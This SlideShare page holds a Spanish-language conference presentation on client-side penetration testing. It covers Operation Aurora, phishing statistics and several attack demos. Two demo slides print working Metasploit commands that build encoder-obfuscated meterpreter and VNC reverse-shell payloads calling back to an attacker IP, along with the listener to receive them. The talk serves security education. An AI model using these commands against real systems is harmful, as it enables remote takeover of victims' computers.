SlideShare una empresa de Scribd logo
1 de 70
What Work’s On
Client Side Pentesting
           CAMPUS PARTY COLOMBIA 2010




   I’m a Pentester         I’m a User
Leonardo Pigñer




             www.base4sec.com


                  @base4sec
iLife
kungfoosion.com

@kfs
lpigner@base4sec.com


www.linkedin.com/in/lpigner
ekoparty.org
16-17 Septiembre 2010
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
¿ Por Qué Client Side ?
DIFERENTES TIPOS DE PENETRATION TESTING

                   No! Yo tengo       Jodanse!
  Wardialing      un 0-day para       Yo entro
  es lo mejor!        IIS 6.0!       caminando




 Phone Attacker   Network Attacker   Social Engineer
INTERNET

                                       ATACANTE




           Firewall
                          DMZ


          LAN

                          SMTP   WWW



DOMINIO         BASE DE
                 DATOS
INTERNET

                                         ATACANTE




                                 Web App FW
              IPS
           Firewall              Reverse Proxy
                          DMZ          IDS


          LAN

                          SMTP   WWW



DOMINIO         BASE DE
                 DATOS
INTERNET



 Firewall   DMZ



LAN
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
La Operación
   Aurora
12 de Enero
            de 2010




                “ataques altamente sofisticados y
               dirigidos ... originados desde China”


[2] Google Blog: A new approach to China
+ 30
[1] Wikipedia: Operation Aurora
“Operación Aurora”
Google se va de China (?)
Google.cn
Google.com.ar
“illegal
          flower
         tribute”
[4] Wikipedia: Illegal flower tribute
PDF, DOC, XLS, CAD, E-mail
                                                                      Texas
      y el resto...




                                                                              Taiwan
                                                         AR
                                                      ,R
                                                  C AB




[3] Mandiant M-Trends “the advanced persistent threat”
0-day para IE 6-7-8

          -   12 de Enero: Anuncio de Google
          -   14 de Enero: Exploit en Wepawet
          -   14 de Enero: Advisory de Microsoft
          -   15 de Enero: PoC de MetaSploit
          -   21 de Enero: Microsoft update (fuera de ciclo)

[6] Wepawet exploit
[7] German government warns against using MS Explorer
www




DEMO #1 “Aurora”
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!
OSVDB 61697
This module exploits a memory corruption flaw in Internet
Explorer. This flaw was found in the wild and was a key
component of the "Operation Aurora" attacks that lead to
the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published
to the Wepawet malware analysis site. The technique used
by this module is currently identical to the public sample, as
such, only Internet Explorer 6 can be reliably exploited.

Afecta a:
- Internet Explorer 6
- Internet Explorer 7
- Internet Explorer 8
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
Distribución y Ataques
payload
   +
encoding
DEMO #2 “Payload + Encoding”

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 X > payload_1.exe

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/
shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t
raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/
call4_dword_xor -c 3 -t exe -o payload_2.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp LHOST=192.168.162.138 LPORT=443 E
Tienes un E-Mail
CASO de ESTUDIO (?)
25000 mails


1883 interesados
Browsers
Sistema
Operativo
Soporte de Java
Versiones
de Flash
Abre mi
          adjunto!




Tienes un E-Mail
Archivos Mas Utilizados

      3%

                     38%
47%


                7%
           4%




DOC    XLS                 PPT
PDF    otros
2008
                                              1968
                                               2009
                                              2195
                                               2010
                                               895




[8] PDF Based Target Attacks are Increasing
DEMO #3 “PDF Exploit”
Mas información en:
KUNGFOOSION: Explotando el 0-day de Adobe
Reader
OSVDB 61697
This module exploits a buffer overflow in Adobe Reader
and Adobe Acrobat Professional < 8.1.3. By creating a
specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.

Afecta a:
- Adobe Reader 8.1.2
+EXE




DEMO #4 “PDF + EXE”
Mas información en:
KUNGFOOSION: Embebiendo un Ejecutable dentro
de un PDF con MetaSploit
+ EXE
2008
                                              1968
                                               2009
                                              2195
                                               2010
                                               895




[8] PDF Based Target Attacks are Increasing
DEMO #5 “Word”
DEMO #5 “Word”
./msfpayload windows/vncinject/reverse_tcp
LHOST=192.168.162.138 LPORT=443 V >
macro_word.bas


./msfcli exploit/multi/handler PAYLOAD=windows/
vncinject/reverse_tcp LHOST=192.168.162.138
LPORT=443 E
La Recepcionista
DEMO #6 “USB U3”
Mas información en:
KUNGFOOSION: Ataque USB U3 con MetaSploit
SET
                      social engineering toolkit



“The Java Applet Attack”
Mas información en:
KUNGFOOSION: Ingeniería Social con Applets
firmados de Java en MetaSploit
Conclusión
Preguntas ?
Gracias!
kungfoosion.com

@kfs
lpigner@base4sec.com


www.linkedin.com/in/lpigner

Más contenido relacionado

Similar a Leonardo pigner sy_r_campusparty2010

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdfJosé Moreno
 
RESUMEN MODULO TIC's
RESUMEN MODULO TIC'sRESUMEN MODULO TIC's
RESUMEN MODULO TIC'sJoselowis
 
Tipos de sistemas operativos
Tipos de sistemas operativosTipos de sistemas operativos
Tipos de sistemas operativosleinyrivera
 
Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Dylan Irzi
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020Jose Anibal Gomez
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020Gladis1221
 
Presentación3 carné gladis12214020
Presentación3 carné gladis12214020 Presentación3 carné gladis12214020
Presentación3 carné gladis12214020 GladisMarroquin
 
Cloud security adoption sophos
Cloud security adoption sophosCloud security adoption sophos
Cloud security adoption sophosCSA Argentina
 
Portafolio digital
Portafolio digitalPortafolio digital
Portafolio digitalMara Montoya
 
Pres3 (menu)
Pres3 (menu)Pres3 (menu)
Pres3 (menu)rogelopez
 
Revista informatica
Revista informaticaRevista informatica
Revista informaticalcttcl
 
Iker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoftIker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsofthhhhhh bh jjjj
 

Similar a Leonardo pigner sy_r_campusparty2010 (20)

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
Pre3
Pre3Pre3
Pre3
 
Presentacion barcamp
Presentacion barcampPresentacion barcamp
Presentacion barcamp
 
RESUMEN MODULO TIC's
RESUMEN MODULO TIC'sRESUMEN MODULO TIC's
RESUMEN MODULO TIC's
 
Tipos de sistemas operativos
Tipos de sistemas operativosTipos de sistemas operativos
Tipos de sistemas operativos
 
Meetup app-moviles
Meetup app-movilesMeetup app-moviles
Meetup app-moviles
 
Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020
 
Presentación3 carné gladis12214020
Presentación3 carné gladis12214020 Presentación3 carné gladis12214020
Presentación3 carné gladis12214020
 
Presentacion 03
Presentacion 03Presentacion 03
Presentacion 03
 
Cloud security adoption sophos
Cloud security adoption sophosCloud security adoption sophos
Cloud security adoption sophos
 
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
 
Portafolio digital
Portafolio digitalPortafolio digital
Portafolio digital
 
Pres3 (menu)
Pres3 (menu)Pres3 (menu)
Pres3 (menu)
 
INTRODUCCION A ANDROID
INTRODUCCION A ANDROIDINTRODUCCION A ANDROID
INTRODUCCION A ANDROID
 
Revista informatica
Revista informaticaRevista informatica
Revista informatica
 
Iker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoftIker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoft
 

Más de campus party

¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad? ¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad? campus party
 
Producción del largometraje pequeñas voces
Producción del largometraje pequeñas vocesProducción del largometraje pequeñas voces
Producción del largometraje pequeñas vocescampus party
 
Conferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvilConferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvilcampus party
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contrerascampus party
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contrerascampus party
 
X taller bluevialiminal
X taller bluevialiminalX taller bluevialiminal
X taller bluevialiminalcampus party
 
X liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-tallerX liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-tallercampus party
 
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1campus party
 
Theremin Alfredo Vargas
Theremin Alfredo Vargas Theremin Alfredo Vargas
Theremin Alfredo Vargas campus party
 
Sonido y cine Ricardo Escallon
Sonido y cine Ricardo Escallon Sonido y cine Ricardo Escallon
Sonido y cine Ricardo Escallon campus party
 
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés BautistaPhotoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautistacampus party
 
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés FonsecaPhotoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonsecacampus party
 
Aseguramiento de Vulnerabilidades Web con tecnologías OWASP
Aseguramiento de Vulnerabilidades Web con tecnologías OWASPAseguramiento de Vulnerabilidades Web con tecnologías OWASP
Aseguramiento de Vulnerabilidades Web con tecnologías OWASPcampus party
 
Mundos virtuales inmersivos y social shopping
Mundos virtuales inmersivos y social shopping Mundos virtuales inmersivos y social shopping
Mundos virtuales inmersivos y social shopping campus party
 
Creación transmediática y comunidades en práctica
Creación transmediática y comunidades en prácticaCreación transmediática y comunidades en práctica
Creación transmediática y comunidades en prácticacampus party
 
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...campus party
 

Más de campus party (20)

Titulo
Titulo Titulo
Titulo
 
¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad? ¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad?
 
Producción del largometraje pequeñas voces
Producción del largometraje pequeñas vocesProducción del largometraje pequeñas voces
Producción del largometraje pequeñas voces
 
Conferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvilConferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvil
 
Liminal Bluevia 1
Liminal Bluevia 1Liminal Bluevia 1
Liminal Bluevia 1
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
 
X taller bluevialiminal
X taller bluevialiminalX taller bluevialiminal
X taller bluevialiminal
 
X liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-tallerX liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-taller
 
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
 
Theremin Alfredo Vargas
Theremin Alfredo Vargas Theremin Alfredo Vargas
Theremin Alfredo Vargas
 
Sonido y cine Ricardo Escallon
Sonido y cine Ricardo Escallon Sonido y cine Ricardo Escallon
Sonido y cine Ricardo Escallon
 
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés BautistaPhotoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
 
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés FonsecaPhotoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
 
Aseguramiento de Vulnerabilidades Web con tecnologías OWASP
Aseguramiento de Vulnerabilidades Web con tecnologías OWASPAseguramiento de Vulnerabilidades Web con tecnologías OWASP
Aseguramiento de Vulnerabilidades Web con tecnologías OWASP
 
Mundos virtuales inmersivos y social shopping
Mundos virtuales inmersivos y social shopping Mundos virtuales inmersivos y social shopping
Mundos virtuales inmersivos y social shopping
 
Creación transmediática y comunidades en práctica
Creación transmediática y comunidades en prácticaCreación transmediática y comunidades en práctica
Creación transmediática y comunidades en práctica
 
Android+Arduino
Android+ArduinoAndroid+Arduino
Android+Arduino
 
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
 
Linux en caja
Linux en cajaLinux en caja
Linux en caja
 

Último

Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITMaricarmen Sánchez Ruiz
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxLolaBunny11
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfJulian Lamprea
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 

Último (10)

Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 

Leonardo pigner sy_r_campusparty2010

  • 1. What Work’s On Client Side Pentesting CAMPUS PARTY COLOMBIA 2010 I’m a Pentester I’m a User
  • 2. Leonardo Pigñer www.base4sec.com @base4sec
  • 4.
  • 6. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  • 7. ¿ Por Qué Client Side ?
  • 8. DIFERENTES TIPOS DE PENETRATION TESTING No! Yo tengo Jodanse! Wardialing un 0-day para Yo entro es lo mejor! IIS 6.0! caminando Phone Attacker Network Attacker Social Engineer
  • 9. INTERNET ATACANTE Firewall DMZ LAN SMTP WWW DOMINIO BASE DE DATOS
  • 10. INTERNET ATACANTE Web App FW IPS Firewall Reverse Proxy DMZ IDS LAN SMTP WWW DOMINIO BASE DE DATOS
  • 11. INTERNET Firewall DMZ LAN
  • 12.
  • 13.
  • 14.
  • 15. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  • 16. La Operación Aurora
  • 17. 12 de Enero de 2010 “ataques altamente sofisticados y dirigidos ... originados desde China” [2] Google Blog: A new approach to China
  • 18. + 30 [1] Wikipedia: Operation Aurora
  • 20. Google se va de China (?)
  • 23. “illegal flower tribute” [4] Wikipedia: Illegal flower tribute
  • 24. PDF, DOC, XLS, CAD, E-mail Texas y el resto... Taiwan AR ,R C AB [3] Mandiant M-Trends “the advanced persistent threat”
  • 25.
  • 26. 0-day para IE 6-7-8 - 12 de Enero: Anuncio de Google - 14 de Enero: Exploit en Wepawet - 14 de Enero: Advisory de Microsoft - 15 de Enero: PoC de MetaSploit - 21 de Enero: Microsoft update (fuera de ciclo) [6] Wepawet exploit [7] German government warns against using MS Explorer
  • 27. www DEMO #1 “Aurora” Mas información en: KUNGFOOSION: Estalló la CyberGuerra!
  • 28. OSVDB 61697 This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited. Afecta a: - Internet Explorer 6 - Internet Explorer 7 - Internet Explorer 8
  • 29. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36. payload + encoding
  • 37. DEMO #2 “Payload + Encoding” ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/ shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/ call4_dword_xor -c 3 -t exe -o payload_2.exe ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/ reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  • 39.
  • 40.
  • 42.
  • 43.
  • 45.
  • 46.
  • 51. Abre mi adjunto! Tienes un E-Mail
  • 52.
  • 53.
  • 54. Archivos Mas Utilizados 3% 38% 47% 7% 4% DOC XLS PPT PDF otros
  • 55. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  • 56. DEMO #3 “PDF Exploit” Mas información en: KUNGFOOSION: Explotando el 0-day de Adobe Reader
  • 57. OSVDB 61697 This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code. Afecta a: - Adobe Reader 8.1.2
  • 58. +EXE DEMO #4 “PDF + EXE” Mas información en: KUNGFOOSION: Embebiendo un Ejecutable dentro de un PDF con MetaSploit
  • 59. + EXE
  • 60. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  • 62. DEMO #5 “Word” ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas ./msfcli exploit/multi/handler PAYLOAD=windows/ vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  • 63.
  • 65. DEMO #6 “USB U3” Mas información en: KUNGFOOSION: Ataque USB U3 con MetaSploit
  • 66. SET social engineering toolkit “The Java Applet Attack” Mas información en: KUNGFOOSION: Ingeniería Social con Applets firmados de Java en MetaSploit
  • 68.